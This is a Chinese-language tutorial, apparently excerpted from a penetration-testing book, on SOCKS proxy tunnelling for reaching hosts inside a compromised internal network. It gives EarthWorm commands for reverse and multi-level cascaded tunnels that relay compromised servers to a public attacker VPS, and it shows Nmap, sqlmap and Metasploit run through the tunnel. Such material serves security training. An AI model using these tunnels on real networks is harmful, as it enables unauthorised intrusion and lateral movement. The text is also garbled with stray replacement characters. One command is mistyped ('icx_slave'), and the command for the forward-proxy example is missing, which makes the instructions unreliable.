常見的網(wǎng)絡(luò)場(chǎng)景有如下三類
服務(wù)器在內(nèi)網(wǎng)中,可以任意訪問外部網(wǎng)絡(luò)��。
服務(wù)器在內(nèi)網(wǎng)中�����,可以訪問外部網(wǎng)絡(luò),但服務(wù)器安裝了防火墻來拒絕敏感端口的連接
服務(wù)器在內(nèi)網(wǎng)中���,對(duì)外只開放了部分端口( 例如 80 端口 )����,且服務(wù)器不能訪問外部網(wǎng)絡(luò)
SOCKS是一種代理服務(wù)�,用于簡(jiǎn)化系統(tǒng)之間的連接。它支持多種協(xié)議�����,包括HTTP��、FTP等�。SOCKS分為兩種類型:SOCKS 4僅支持TCP協(xié)議,而SOCKS 5不僅支持TCP/UDP協(xié)議�����,還支持各種身份驗(yàn)證機(jī)制���,其標(biāo)準(zhǔn)端口為1080��。通過SOCKS����,可以與目標(biāo)內(nèi)網(wǎng)計(jì)算機(jī)通信�,避免多次使用端口轉(zhuǎn)發(fā)。
SOCKS代理可以看作是增強(qiáng)版的lcx�。在服務(wù)端監(jiān)聽一個(gè)端口,當(dāng)有新的連接請(qǐng)求時(shí)��,會(huì)從SOCKS協(xié)議中解析出目標(biāo)URL的目標(biāo)端口��,然后執(zhí)行l(wèi)cx的具體功能��。有許多SOCKS代理工具可供選擇���,在使用時(shí)最好選擇沒有圖形用戶界面(GUI)的工具����。此外��,最好選擇無需安裝其他依賴軟件的SOCKS代理工具��,以及能夠支持多平臺(tái)的工具�。
1. EarthWorm (EW):
EarthWorm(EW)是一套便攜式網(wǎng)絡(luò)工具,主要具備 SOCKS5 服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能,可在復(fù)雜的網(wǎng)絡(luò)環(huán)境中實(shí)現(xiàn)網(wǎng)絡(luò)穿透�����。EW可以通過正向�����、反向���、多級(jí)級(jí)聯(lián)等方式建立網(wǎng)絡(luò)隧道�。EW工具包提供了多個(gè)可執(zhí)行文件�����,適用于不同操作系統(tǒng)(包括Linux�����、Windows��、Mac OS�、ARM-Linux)。
2. reGeorg:
reGeorg是reDuh的升級(jí)版�,其主要功能是通過HTTP/HTTPS隧道將內(nèi)網(wǎng)服務(wù)器的端口轉(zhuǎn)發(fā)到本機(jī)�,形成一個(gè)回路�����。reGeorg可以使目標(biāo)服務(wù)器在內(nèi)網(wǎng)中(或在設(shè)置了端口策略的情況下)連接內(nèi)部開放端口�。reGeorg利用WebShell建立一個(gè)SOCKS代理進(jìn)行內(nèi)網(wǎng)穿透���,服務(wù)器必須支持ASPX��、PHP�、JSP中的一種����。
3. sSocks:
sSocks是一個(gè)SOCKS代理工具套裝,可用于啟動(dòng)SOCKS代理服務(wù)���。sSocks支持SOCKS 5驗(yàn)證�����,同時(shí)支持IPv6和UDP�����,并提供反向SOCKS代理服務(wù)(將遠(yuǎn)程計(jì)算機(jī)作為SOCKS代理服務(wù)端反彈到本地)��。
4. SocksCap64:
SocksCap64是在Windows環(huán)境中非常實(shí)用的全局代理軟件���。它可以使Windows應(yīng)用程序通過SOCKS代理服務(wù)器訪問網(wǎng)絡(luò)�����,而無需對(duì)這些應(yīng)用程序進(jìn)行任何修改����。即使是那些本身不支持SOCKS代理的應(yīng)用程序����,也可以通過SocksCap64實(shí)現(xiàn)代理訪問。
5. Proxifier:
Proxifier同樣是一款非常實(shí)用的全局代理軟件�,提供了跨平臺(tái)的轉(zhuǎn)發(fā)和代理功能,適用于Windows����、Linux、MacOS平臺(tái)�。
6. ProxyChains:
ProxyChains是一款能夠在Linux下實(shí)現(xiàn)全局代理的軟件,性能穩(wěn)定可靠���。它可以使任何程序通過代理上網(wǎng)�����,允許TCP和DNS流量通過代理隧道�����,同時(shí)支持HTTP��、SOCKS 4和SOCKS 5類型的代理服務(wù)器�。
SOCKS 代理技術(shù)在網(wǎng)絡(luò)環(huán)境中的應(yīng)用
1. EarthWorm的應(yīng)用:
在測(cè)試環(huán)境中��,左側(cè)是個(gè)人計(jì)算機(jī)(內(nèi)網(wǎng))和一臺(tái)具有公網(wǎng)IP地址的VPS��,右側(cè)是一個(gè)小型內(nèi)網(wǎng)�����。假設(shè)已獲得了一臺(tái)Web服務(wù)器的權(quán)限����,其內(nèi)網(wǎng)IP地址為10.48.128.25,該服務(wù)器是連接外網(wǎng)和內(nèi)網(wǎng)的關(guān)鍵節(jié)點(diǎn)���,其他內(nèi)網(wǎng)服務(wù)器不能直接連接��。
在滲透測(cè)試中�,常用的SOCKS工具之一是EW。該程序體積小��,使用時(shí)無需其他設(shè)置��。EW有六種命令格式�,包括ssocksd、rcsocks�、rssocks、lcx_slave��、lcx_listen�、lcx_tran。其中��,用于正向連接的命令是ssocksd����,用于反彈連接的命令是rcsocks、rssocks�,其他命令用于復(fù)雜網(wǎng)絡(luò)環(huán)境的多級(jí)級(jí)聯(lián)。
(1) 正向SOCKS5服務(wù)器:
適用于目標(biāo)機(jī)器有外網(wǎng)IP地址的情況���。
該命令在端口888上搭建了一個(gè)SOCKS代理���,隨后可通過SocksCap4等工具使用代理��。
(2) 反彈SOCKS5服務(wù)器:
目標(biāo)機(jī)器沒有公網(wǎng)IP地址���,需要訪問內(nèi)網(wǎng)資源。
ew -s rcsocks -l 1008 -e 888
該命令在10.48.128.25服務(wù)器上啟動(dòng)SOCKS5服務(wù)�����,然后反彈到139.*.*.113的公網(wǎng)VPS的888端口����。通過訪問公網(wǎng)VPS的1008端口���,可使用在10.48.128.25服務(wù)器上搭建的SOCKS5代理���。
(3) 二級(jí)網(wǎng)絡(luò)環(huán)境(a):
已獲得右側(cè)A主機(jī)和B主機(jī)的控制權(quán)限。
ew -s ssocksd -L 888 # 在B主機(jī)上ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888 # 在A主機(jī)上
將A主機(jī)上收到的代理請(qǐng)求轉(zhuǎn)發(fā)給B主機(jī)的888端口��,可通過訪問公網(wǎng)VPS的1080端口使用在B主機(jī)上搭建的SOCKS5代理�����。
(4) 二級(jí)網(wǎng)絡(luò)環(huán)境(b):
已獲得右側(cè)A主機(jī)和B主機(jī)的控制權(quán)限,A主機(jī)沒有公網(wǎng)IP地址���。
ew -s lcx_listen -l 10800 -e 888 ew -s ssocksd -l 999 ew -s lcx_slave -d 139.*.*.113 -e 888 -f 10.48.128.49 -g 999
在公網(wǎng)VPS上添加轉(zhuǎn)接隧道�,將收到的代理請(qǐng)求轉(zhuǎn)發(fā)給B主機(jī)的999端口�,最后可通過訪問公網(wǎng)VPS的10800端口使用在B主機(jī)上搭建的SOCKS5代理。
(5) 三級(jí)網(wǎng)絡(luò)環(huán)境:
測(cè)試環(huán)境為右側(cè)A主機(jī)沒有公網(wǎng)IP地址�,但可以訪問外網(wǎng);B主機(jī)不能訪問外網(wǎng)�����,但可以被A主機(jī)訪問��;C主機(jī)可被B主機(jī)訪問����,且能夠訪問核心區(qū)域。
ew -s rcsocks -l 1080 -e 888 # 在公網(wǎng)VPS上ew -s icx_slave -d 139.*.*.113 -e 888 -f 10.48.128.12 -g 999 # 在A主機(jī)上ew -s lcx_listen -l 999 -e 777 # 在B主機(jī)上ew -s rssocks -d 10.48.128.12 -e 777 # 在C主機(jī)上
通過將公網(wǎng)VPS的1080端口和B主機(jī)的999端口連接�����,再連接B主機(jī)的777端口和C主機(jī)上的SOCKS5代理,可通過訪問公網(wǎng)VPS的1080端口使用在C主機(jī)上搭建的SOCKS代理�。
2. 在Windows下使用SocksCap64實(shí)現(xiàn)內(nèi)網(wǎng)漫游:
下載并安裝SocksCap64,以管理員權(quán)限打開程序�。默認(rèn)已添加瀏覽器。
啟動(dòng)SocksCap64�,添加代理并設(shè)置IP地址和端口。
單擊“代理”按鈕�����,添加代理服務(wù)器后��,可以單擊界面上的閃電圖標(biāo)按鈕測(cè)試代理服務(wù)器連接�����。
選擇瀏覽器�,右鍵點(diǎn)擊,在快捷菜單中選擇“在代理隧道中運(yùn)行選中程序”�,即可自由訪問內(nèi)網(wǎng)資源�����,如訪問10.48.128.22的80端口或登錄10.48.128.20的3389端口���。
3. 在Linux下使用ProxyChains實(shí)現(xiàn)內(nèi)網(wǎng)漫游:
在終端輸入“proxychains firefox”命令�����,啟動(dòng)Firefox瀏覽器����。
瀏覽器打開后,訪問10.48.128.22的80端口�����,然后訪問10.48.128.48����,查看Zend服務(wù)器測(cè)試頁。
運(yùn)行Nmap和sqlmap�����,這兩個(gè)工具都能正常使用�。
嘗試使用Metasploit掃描任意IP地址,查看端口情況�。
參考文獻(xiàn):《內(nèi)網(wǎng)安全攻防滲透測(cè)試實(shí)戰(zhàn)攻防》
閱讀原文:原文鏈接
該文章在 2025/10/9 13:16:24 編輯過
400 186 1886
